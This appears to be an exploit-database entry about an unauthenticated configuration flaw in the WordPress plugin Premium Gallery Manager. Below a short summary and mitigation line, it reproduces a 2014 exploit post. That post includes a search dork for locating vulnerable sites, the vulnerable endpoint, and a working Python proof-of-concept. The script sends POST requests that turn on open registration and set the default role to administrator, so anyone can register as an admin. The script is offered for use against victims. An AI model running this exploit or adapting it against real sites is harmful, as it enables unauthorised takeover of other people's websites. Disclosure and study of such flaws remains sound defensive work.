Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability

vendor:

Premium Gallery Manager

by:

Hannaichi

7,5

CVSS

HIGH

Unauthenticated Configuration Access

N/A

CWE

Product Name: Premium Gallery Manager

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 32-bit | Google Chrome

2014

WordPress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability

A vulnerability in the Wordpress Plugins Premium Gallery Manager allows an unauthenticated user to access the configuration of the plugin. This can be exploited by sending a POST request to the ajax.php file with the action set to 'save' and the values set to the desired configuration. This can be used to set the admin email, allow users to register, and set the default role to administrator.

Mitigation:

Ensure that the Wordpress Plugins Premium Gallery Manager is up to date and that all users are authenticated before accessing the configuration.

Source

Exploit-DB raw data:

#Exploit Title : Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability
#Author : Hannaichi [@dntkun]
#Date : February 5th, 2014
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : Unauthenticated Configuration Access
#Tested On : Windows 7 32-bit | Google Chrome 

#Dork : inurl:/wp-content/plugins/premium_gallery_manager/ | USE YOUR BRAIN =))

#Exploit : http://victim/[PATH]/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php

#POC : 
Save File As Python (.py) = 
import httplib, urllib

#target site
site = "victim" #<--- no http:// or https://
#path to ajax.php
url = "/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    print response.status, response.reason
    data = response.read()
    print data
    conn.close()
     
ChangeOption(site, url, "admin_email", "youremail@test.com")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"


#Place It Broo No Lazy For This :D !!

--------------------------------------------------------------------------------------------------------------------

Thanks to: #AnonSec Hackers - Borneo Security - Bekantan Crew - Indonesian Hacker - Muslim Hacker - You :*